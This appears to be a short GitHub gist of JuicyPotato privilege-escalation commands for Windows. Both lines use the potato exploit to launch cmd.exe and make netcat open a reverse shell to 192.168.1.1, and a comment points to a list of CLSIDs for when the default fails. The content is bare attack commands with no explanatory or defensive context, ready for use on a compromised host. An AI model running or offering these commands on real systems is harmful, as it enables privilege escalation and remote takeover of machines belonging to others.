Skip to content

Instantly share code, notes, and snippets.

@tanaka-geek
Last active March 3, 2021 18:39
Show Gist options
  • Save tanaka-geek/f7ebfc8f7660eb235aa636e4d4e6fa75 to your computer and use it in GitHub Desktop.
Save tanaka-geek/f7ebfc8f7660eb235aa636e4d4e6fa75 to your computer and use it in GitHub Desktop.
JuicyPotato.exe -t t -p C:\Windows\System32\cmd.exe -l 8888 -a "/c c:\Users\Public\Downloads\nc.exe -e cmd.exe 192.168.1.1 443"
# If this does not work, need to pick CLSID manually from
# http://ohpe.it/juicy-potato/CLSID/
potato.exe -t t -p C:\Windows\System32\cmd.exe -l 8888 -a "/c c:\TEMP\nc.exe -e cmd.exe 192.168.1.1" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment